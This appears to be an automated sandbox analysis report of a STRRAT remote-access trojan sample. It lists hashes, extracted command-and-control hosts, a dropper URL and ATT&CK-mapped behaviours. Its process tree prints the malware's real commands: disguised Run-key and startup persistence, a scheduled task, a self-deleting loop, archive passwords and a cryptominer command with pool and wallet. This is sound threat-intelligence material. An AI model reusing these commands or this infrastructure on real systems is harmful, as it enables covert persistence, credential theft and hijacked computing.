strrat | 4e0ddcd303f27c01dcc8a35a9bd821c53fb7dcca474ac7f0c84d3c6451e9f778

Resubmissions

09-04-2024 13:34

240409-qvlrtabe9s 10

09-04-2024 13:34

09-04-2024 13:33

09-04-2024 13:33

07-07-2023 11:45

Analysis

max time kernel
1199s
max time network
1202s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
09-04-2024 13:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

14052163e50c197697c64b143.exe
Size

17.6MB
MD5

14052163e50c197697c64b1431b42271
SHA1

df301332faa73c3d5f915fde61df2fc9de21a61a
SHA256

4e0ddcd303f27c01dcc8a35a9bd821c53fb7dcca474ac7f0c84d3c6451e9f778
SHA512

124f6fb9812fe56fc9428a53206e67ada7a5221bbac08204c52fc9df970a492f133ac3911b1cfd2a76c58b8921580f58b2f8d32db7395442549bdfefafc3bfab
SSDEEP

393216:LOh37DR+wwmOoDxRz016TCORfagi8boLH6fQmQa9T1AE0Grq:g/FRxRzlRfPeLajLlg

Score

10^/10

strrat discovery evasion persistence stealer trojan

Malware Config

Extracted

Family

strrat

rar.ydns.eu:9999

svchost.ydns.eu:10000

Attributes

license_id
khonsari
plugins_url
http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5
scheduled_task
false
secondary_startup
false
startup
true

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://files.catbox.moe/fvl5hy.jpg

Signatures

STRRAT
STRRAT is a remote access tool than can steal credentials and log keystrokes.
trojan stealer strrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	x.exe

Blocklisted process makes network request 47 IoCs

flow	pid	Process
7	4192	wscript.exe
8	4192	wscript.exe
10	3424	powershell.exe
11	3424	powershell.exe
13	4192	wscript.exe
18	4192	wscript.exe
26	4192	wscript.exe
30	4192	wscript.exe
36	4192	wscript.exe
39	4192	wscript.exe
42	4192	wscript.exe
44	4192	wscript.exe
46	4192	wscript.exe
48	4192	wscript.exe
51	4192	wscript.exe
56	4192	wscript.exe
58	4192	wscript.exe
61	4192	wscript.exe
64	4192	wscript.exe
67	4192	wscript.exe
69	4192	wscript.exe
71	4192	wscript.exe
73	4192	wscript.exe
75	4192	wscript.exe
77	4192	wscript.exe
79	4192	wscript.exe
81	4192	wscript.exe
84	4192	wscript.exe
86	4192	wscript.exe
88	4192	wscript.exe
90	4192	wscript.exe
92	4192	wscript.exe
94	4192	wscript.exe
96	4192	wscript.exe
99	4192	wscript.exe
101	4192	wscript.exe
103	4192	wscript.exe
105	4192	wscript.exe
107	4192	wscript.exe
109	4192	wscript.exe
111	4192	wscript.exe
113	4192	wscript.exe
115	4192	wscript.exe
118	4192	wscript.exe
120	4192	wscript.exe
122	4192	wscript.exe
124	4192	wscript.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	x.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	x.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Antimalware Service Executable.JS	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Antimalware Service Executable.JS	wscript.exe

Executes dropped EXE 34 IoCs

pid	Process
1448	EmbraTor Mac Smash Bullet.exe
808	x.exe
764	CL_Debug_Log.txt
4708	Helper.exe
1752	Helper.exe
2364	Helper.exe
3640	tor.exe
220	Helper.exe
4264	Helper.exe
3132	Helper.exe
4388	Helper.exe
1204	Helper.exe
4548	Helper.exe
1544	Helper.exe
5032	Helper.exe
4572	Helper.exe
1652	Helper.exe
1704	Helper.exe
3152	Helper.exe
232	Helper.exe
3704	Helper.exe
2352	Helper.exe
2452	Helper.exe
3684	Helper.exe
2456	Helper.exe
1472	Helper.exe
2428	Helper.exe
4600	Helper.exe
768	Helper.exe
1208	Helper.exe
340	Helper.exe
5012	Helper.exe
1512	Helper.exe
2860	Helper.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000\Software\Wine	x.exe

Loads dropped DLL 10 IoCs

pid	Process
692	java.exe
3488	java.exe
3640	tor.exe
3640	tor.exe
3640	tor.exe
3640	tor.exe
3640	tor.exe
3640	tor.exe
3640	tor.exe
3640	tor.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4804	icacls.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antimalware Service Executable = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Antimalware Service Executable.JS\""	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Antimalware Service Executable = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Antimalware Service Executable.JS\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antimalware Service Executable = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Antimalware Service Executable.JS\""	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Antimalware Service Executable = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Antimalware Service Executable.JS\""	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000\Software\Microsoft\Windows\CurrentVersion\Run\Java Install = "\"C:\\Program Files\\Java\\jre-1.8\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\Java Install.jar\""	java.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Install = "\"C:\\Program Files\\Java\\jre-1.8\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\Java Install.jar\""	java.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

AutoIT Executable 8 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral4/memory/808-132-0x0000000000330000-0x0000000001556000-memory.dmp	autoit_exe
behavioral4/memory/808-148-0x0000000000330000-0x0000000001556000-memory.dmp	autoit_exe
behavioral4/memory/808-149-0x0000000000330000-0x0000000001556000-memory.dmp	autoit_exe
behavioral4/memory/808-164-0x0000000000330000-0x0000000001556000-memory.dmp	autoit_exe
behavioral4/memory/808-189-0x0000000000330000-0x0000000001556000-memory.dmp	autoit_exe
behavioral4/files/0x0002000000025c80-248.dat	autoit_exe
behavioral4/files/0x0002000000025c7f-281.dat	autoit_exe
behavioral4/memory/808-293-0x0000000000330000-0x0000000001556000-memory.dmp	autoit_exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1716	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2032	timeout.exe
4612	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000_Classes\Local Settings	14052163e50c197697c64b143.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3424	powershell.exe
3424	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeRestorePrivilege	764	CL_Debug_Log.txt
Token: 35	764	CL_Debug_Log.txt
Token: SeSecurityPrivilege	764	CL_Debug_Log.txt
Token: SeSecurityPrivilege	764	CL_Debug_Log.txt
Token: SeRestorePrivilege	2364	Helper.exe
Token: 35	2364	Helper.exe
Token: SeSecurityPrivilege	2364	Helper.exe
Token: SeSecurityPrivilege	2364	Helper.exe
Token: SeRestorePrivilege	3132	Helper.exe
Token: 35	3132	Helper.exe
Token: SeSecurityPrivilege	3132	Helper.exe
Token: SeSecurityPrivilege	3132	Helper.exe
Token: SeLockMemoryPrivilege	4984	attrib.exe
Token: SeLockMemoryPrivilege	4984	attrib.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
808	x.exe
808	x.exe
808	x.exe
4708	Helper.exe
4708	Helper.exe
4708	Helper.exe
220	Helper.exe
220	Helper.exe
220	Helper.exe
4264	Helper.exe
4264	Helper.exe
4264	Helper.exe
4984	attrib.exe
4388	Helper.exe
4388	Helper.exe
4388	Helper.exe
4388	Helper.exe
1204	Helper.exe
1204	Helper.exe
1204	Helper.exe
1204	Helper.exe
4548	Helper.exe
4548	Helper.exe
4548	Helper.exe
1544	Helper.exe
1544	Helper.exe
1544	Helper.exe
4548	Helper.exe
4548	Helper.exe
5032	Helper.exe
5032	Helper.exe
5032	Helper.exe
5032	Helper.exe
4572	Helper.exe
4572	Helper.exe
4572	Helper.exe
4572	Helper.exe
1652	Helper.exe
1652	Helper.exe
1704	Helper.exe
1652	Helper.exe
1652	Helper.exe
1704	Helper.exe
1704	Helper.exe
1704	Helper.exe
232	Helper.exe
232	Helper.exe
232	Helper.exe
3152	Helper.exe
3152	Helper.exe
3152	Helper.exe
3152	Helper.exe
3704	Helper.exe
3704	Helper.exe
3704	Helper.exe
3704	Helper.exe
2352	Helper.exe
2352	Helper.exe
2352	Helper.exe
2352	Helper.exe
2452	Helper.exe
2452	Helper.exe
2452	Helper.exe
2452	Helper.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
808	x.exe
808	x.exe
808	x.exe
4708	Helper.exe
4708	Helper.exe
4708	Helper.exe
220	Helper.exe
220	Helper.exe
220	Helper.exe
4264	Helper.exe
4264	Helper.exe
4264	Helper.exe
4388	Helper.exe
4388	Helper.exe
4388	Helper.exe
4388	Helper.exe
1204	Helper.exe
1204	Helper.exe
1204	Helper.exe
1204	Helper.exe
4548	Helper.exe
4548	Helper.exe
4548	Helper.exe
1544	Helper.exe
1544	Helper.exe
1544	Helper.exe
4548	Helper.exe
4548	Helper.exe
5032	Helper.exe
5032	Helper.exe
5032	Helper.exe
5032	Helper.exe
4572	Helper.exe
4572	Helper.exe
4572	Helper.exe
4572	Helper.exe
1652	Helper.exe
1652	Helper.exe
1704	Helper.exe
1652	Helper.exe
1652	Helper.exe
1704	Helper.exe
1704	Helper.exe
1704	Helper.exe
232	Helper.exe
232	Helper.exe
232	Helper.exe
3152	Helper.exe
3152	Helper.exe
3152	Helper.exe
3152	Helper.exe
3704	Helper.exe
3704	Helper.exe
3704	Helper.exe
3704	Helper.exe
2352	Helper.exe
2352	Helper.exe
2352	Helper.exe
2352	Helper.exe
2452	Helper.exe
2452	Helper.exe
2452	Helper.exe
2452	Helper.exe
3684	Helper.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1448	EmbraTor Mac Smash Bullet.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4608 wrote to memory of 2608	4608	14052163e50c197697c64b143.exe	76
PID 4608 wrote to memory of 2608	4608	14052163e50c197697c64b143.exe	76
PID 4608 wrote to memory of 2608	4608	14052163e50c197697c64b143.exe	76
PID 4608 wrote to memory of 2144	4608	14052163e50c197697c64b143.exe	77
PID 4608 wrote to memory of 2144	4608	14052163e50c197697c64b143.exe	77
PID 4608 wrote to memory of 2144	4608	14052163e50c197697c64b143.exe	77
PID 4608 wrote to memory of 3340	4608	14052163e50c197697c64b143.exe	78
PID 4608 wrote to memory of 3340	4608	14052163e50c197697c64b143.exe	78
PID 4608 wrote to memory of 3340	4608	14052163e50c197697c64b143.exe	78
PID 4608 wrote to memory of 3900	4608	14052163e50c197697c64b143.exe	79
PID 4608 wrote to memory of 3900	4608	14052163e50c197697c64b143.exe	79
PID 4608 wrote to memory of 1448	4608	14052163e50c197697c64b143.exe	80
PID 4608 wrote to memory of 1448	4608	14052163e50c197697c64b143.exe	80
PID 4608 wrote to memory of 1448	4608	14052163e50c197697c64b143.exe	80
PID 3900 wrote to memory of 4804	3900	javaw.exe	81
PID 3900 wrote to memory of 4804	3900	javaw.exe	81
PID 3340 wrote to memory of 3424	3340	WScript.exe	82
PID 3340 wrote to memory of 3424	3340	WScript.exe	82
PID 3340 wrote to memory of 3424	3340	WScript.exe	82
PID 2608 wrote to memory of 4192	2608	WScript.exe	85
PID 2608 wrote to memory of 4192	2608	WScript.exe	85
PID 2608 wrote to memory of 4192	2608	WScript.exe	85
PID 2144 wrote to memory of 808	2144	WScript.exe	87
PID 2144 wrote to memory of 808	2144	WScript.exe	87
PID 2144 wrote to memory of 808	2144	WScript.exe	87
PID 808 wrote to memory of 764	808	x.exe	88
PID 808 wrote to memory of 764	808	x.exe	88
PID 808 wrote to memory of 764	808	x.exe	88
PID 808 wrote to memory of 3908	808	x.exe	90
PID 808 wrote to memory of 3908	808	x.exe	90
PID 808 wrote to memory of 3908	808	x.exe	90
PID 3908 wrote to memory of 1716	3908	cmd.exe	92
PID 3908 wrote to memory of 1716	3908	cmd.exe	92
PID 3908 wrote to memory of 1716	3908	cmd.exe	92
PID 808 wrote to memory of 876	808	x.exe	93
PID 808 wrote to memory of 876	808	x.exe	93
PID 808 wrote to memory of 876	808	x.exe	93
PID 876 wrote to memory of 2032	876	cmd.exe	95
PID 876 wrote to memory of 2032	876	cmd.exe	95
PID 876 wrote to memory of 2032	876	cmd.exe	95
PID 876 wrote to memory of 4612	876	cmd.exe	96
PID 876 wrote to memory of 4612	876	cmd.exe	96
PID 876 wrote to memory of 4612	876	cmd.exe	96
PID 3900 wrote to memory of 692	3900	javaw.exe	97
PID 3900 wrote to memory of 692	3900	javaw.exe	97
PID 692 wrote to memory of 3488	692	java.exe	99
PID 692 wrote to memory of 3488	692	java.exe	99
PID 4708 wrote to memory of 1752	4708	Helper.exe	102
PID 4708 wrote to memory of 1752	4708	Helper.exe	102
PID 220 wrote to memory of 4264	220	Helper.exe	109
PID 220 wrote to memory of 4264	220	Helper.exe	109
PID 4388 wrote to memory of 1544	4388	Helper.exe	118
PID 4388 wrote to memory of 1544	4388	Helper.exe	118
PID 4548 wrote to memory of 1652	4548	Helper.exe	121
PID 4548 wrote to memory of 1652	4548	Helper.exe	121
PID 4572 wrote to memory of 232	4572	Helper.exe	124
PID 4572 wrote to memory of 232	4572	Helper.exe	124
PID 3152 wrote to memory of 2452	3152	Helper.exe	127
PID 3152 wrote to memory of 2452	3152	Helper.exe	127
PID 2352 wrote to memory of 1472	2352	Helper.exe	130
PID 2352 wrote to memory of 1472	2352	Helper.exe	130
PID 2456 wrote to memory of 768	2456	Helper.exe	133
PID 2456 wrote to memory of 768	2456	Helper.exe	133
PID 4600 wrote to memory of 5012	4600	Helper.exe	136

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4984	attrib.exe

C:\Users\Admin\AppData\Local\Temp\14052163e50c197697c64b143.exe
"C:\Users\Admin\AppData\Local\Temp\14052163e50c197697c64b143.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4608
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Antimalware Service Executable.JS"
  2⤵
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.JS"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Adds Run key to start application
    PID:4192
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MsMpEng.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2144
- - C:\Users\Admin\AppData\Local\Temp\x.exe
    "C:\Users\Admin\AppData\Local\Temp\x.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:808
  - - C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
      C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3908
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
        5⤵
        Creates scheduled task(s)
        
        PID:1716
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\x.exe"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\x.exe" exit)
      4⤵
      Suspicious use of WriteProcessMemory
      PID:876
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2032
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4612
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Windows Driver Foundation.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\ProgramData\rrrrrrrr.ps1"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3424
- C:\Program Files\Java\jre-1.8\bin\javaw.exe
  "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\Java Install.jar"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3900
- - C:\Windows\system32\icacls.exe
    C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
    3⤵
    - Modifies file permissions
    PID:4804
- - C:\Program Files\Java\jre-1.8\bin\java.exe
    "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar "C:\Users\Admin\Java Install.jar"
    3⤵
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:692
  - - C:\Program Files\Java\jre-1.8\bin\java.exe
      "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar "C:\Users\Admin\AppData\Roaming\Java Install.jar"
      4⤵
      Loads dropped DLL
      PID:3488
- C:\Users\Admin\AppData\Local\Temp\EmbraTor Mac Smash Bullet.exe
  "C:\Users\Admin\AppData\Local\Temp\EmbraTor Mac Smash Bullet.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1448

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4708
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
  2⤵
  - Executes dropped EXE
  PID:1752
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2364
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3640
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3132
- - C:\Windows\System32\attrib.exe
    -a RandomX -o stratum+tcp://xmr.2miners.com:2222 -u 8BayjhYeujm9whuyNMsrd46tWdEd4JfAPfq6nXn1S4zrLzB9dduLbPuFPb3M2ZRFtfa6Zugfv5643AuBbmP8PDHaS3hQDdi.fhaw -p x -t 2
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Views/modifies file attributes
    PID:4984

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:220
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4264

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4388
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1544

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1204

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4548
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1652

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5032

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4572
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:232

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1704

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3152
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2452

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3704

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
  2⤵
  - Executes dropped EXE
  PID:1472

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:3684

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2456
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
  2⤵
  - Executes dropped EXE
  PID:768

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
PID:2428

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4600
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
  2⤵
  - Executes dropped EXE
  PID:5012

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
PID:1208

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
PID:340

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
PID:1512

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
1⤵
- Executes dropped EXE
PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

